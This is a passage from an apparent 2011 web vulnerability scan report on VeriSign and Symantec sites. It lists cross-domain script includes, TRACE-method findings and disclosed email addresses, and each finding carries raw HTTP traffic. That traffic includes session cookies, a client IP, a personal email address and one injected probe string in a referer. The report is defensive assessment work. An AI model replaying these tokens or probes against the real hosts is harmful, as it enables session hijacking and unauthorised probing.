Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Type: text/html
Content-Length: 104571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" />

   <!--HEADER ASSETS-->
       <link href="ht
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.42. http://www.verisign.com/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /trust-seal/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:13 GMT
Content-Type: text/html
Content-Length: 49851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="X-UA-Comp
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
<div id="vid_container">


<script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent">
</script>
...[SNIP]...

15.43. http://www.verisign.com/verisign-worldwide/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /verisign-worldwide/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html
Content-Length: 42646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
               
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...

15.44. https://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.45. https://www.verisign.com/products-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /products-services/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products-services/index.html HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://securitycenter.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 107427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

   <!--HEADER ASSETS-->
       <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...

16. TRACE method is enabled
There are 7 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


16.1. http://1168.ic-live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1168.ic-live.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 1168.ic-live.com
Cookie: 3a8169a39c743817

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from i2a-coll-17
X-Cache-Lookup: NONE from i2a-coll-17:80
Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: 1168.ic-live.com
Cookie: 3a8169a39c743817; cvt586=106159628; ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; cvt522=33083100; sid1168=1315603546sI0iG1jH0qF3
Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21)
X-Forwarded-For:
...[SNIP]...

16.2. http://blogs.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.verisign.com
Cookie: c714ff1fc488237d

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: blogapp:8080
Cookie: c714ff1fc488237d; v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0
...[SNIP]...

16.3. https://cert.webtrust.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /

Request

TRACE / HTTP/1.0
Host: cert.webtrust.org
Cookie: 96a6b86bb9621aaa

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:31 GMT
Server: Apache/1.3.27 (Unix) PHP/4.3.1 mod_ssl/2.8.14 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 96a6b86bb9621aaa
Host: cert.webtrust.org


16.4. https://donate.mozilla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /

Request

TRACE / HTTP/1.0
Host: donate.mozilla.org
Cookie: f47eeb57d4e2c95f

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Fri, 09 Sep 2011 22:14:47 GMT
Connection: close
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/

TRACE / HTTP/1.0
X-Cluster-SSL: 1
Host: donate.mozilla.org
X-Cluster-Client-Ip: 50.23.123.106
Cookie: f47eeb57d4e2c95f; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC; WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Connection: Keep-Alive


16.5. https://partnernet.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://partnernet.symantec.com
Path:   /

Request

TRACE / HTTP/1.0
Host: partnernet.symantec.com
Cookie: aa6e229900a35a85

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:06 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: partnernet.symantec.com
Cookie: aa6e229900a35a85; JSESSIONID=JpgsTqLJpsGcTPQ9r6vf2nW4Lnx1ZQCYB8m9fcNQn2D7vsdhGhHr!-248941162; s_sv_112_s1=1@16@a//1315621570007; SymantecMobile=false; IS3_History=0-0-0____; s_sq=%5B%5BB%5D%5D; bizProdScrollVertical=0
...[SNIP]...

16.6. http://press.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://press.verisign.com
Path:   /

Request

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: 356f27a0513049ad

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: 356f27a0513049ad; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
...[SNIP]...

16.7. https://press.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /

Request

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: dfcbafb64e98c2be

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:42:31 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: press.verisign.com
Cookie: dfcbafb64e98c2be; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
...[SNIP]...

17. Email addresses disclosed
There are 71 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


17.1. http://blogs.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?tid=footer HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 20:19:01 GMT
ETag: "1a606f6-9f7a-c8827740"
Accept-Ranges: bytes
Content-Length: 40826
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.2. http://blogs.verisign.com/web-user-experience/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /web-user-experience/

Issue detail

The following email address was disclosed in the response:

Request

GET /web-user-experience/ HTTP/1.1
Host: blogs.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:59 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.0.4
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>
<tit
...[SNIP]...
<a href="contact'>mailto:reshma.kumar@gmail.com">
...[SNIP]...

17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /assets/shared/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/shared/js/jquery.cookie.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Age: 6982
Date: Fri, 09 Sep 2011 21:27:08 GMT
Last-Modified: Wed, 19 Jan 2011 20:34:23 GMT
Expires: Sun, 09 Oct 2011 13:03:09 GMT
Content-Length: 4341
Connection: keep-alive

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 39037
Expires: Sun, 09 Oct 2011 10:47:51 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.5. https://enterprise-ssl-admin.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprise-ssl-admin.verisign.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: enterprise-ssl-admin.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:53 GMT
Content-length: 1304
Content-type: text/html
Connection: close

<HTML>

<HEAD>
<TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE>
<link href="../stylesheet.css" rel="stylesheet" type="text/css" />
</HEAD>

<BODY>
<table width=720 bord
...[SNIP]...
<A HREF="mailto: enterprise-sslsupport@verisign.com">
...[SNIP]...

17.6. https://fileconnect.symantec.com/javascript/calendar2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /javascript/calendar2.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/calendar2.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 6722
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

// Title: Tigra Calendar
// Description: See the demo at url
// URL: http://www.softcomplex.com/products/tigra_calendar/
// Version: 3.1 (American date format)
// Date: 08-08-2002 (mm-dd-yyyy)
// Feedback: feedback@softcomplex.com (specify product title in the subject)
// Note: Permission given to use this script in ANY kind of applications if
// header lines are left unchanged.
// Note: Script consists of two files: calendar?.js and calendar.html
// About us: Our company provides offshore IT consulting services.
// Contact us at sales@softcomplex.com if you have any programming task you
// want to be handled by professionals. Our typical hourly rate is $20.

// if two digit year input dates after this year considered 20 century.
var NUM_CEN
...[SNIP]...

17.7. https://idprotect.verisign.com/learnmore.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /learnmore.v

Issue detail

The following email address was disclosed in the response:

Request

GET /learnmore.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:38 GMT
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 11736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.8. https://idprotect.verisign.com/orderstart.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /orderstart.v

Issue detail

The following email address was disclosed in the response:

Request

GET /orderstart.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:55 GMT
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.9. https://idprotect.verisign.com/toolbar/activate.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The following email address was disclosed in the response:

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:43 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5737
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.10. https://idprotect.verisign.com/toolbar/download.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/download.v

Issue detail

The following email address was disclosed in the response:

Request

GET /toolbar/download.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
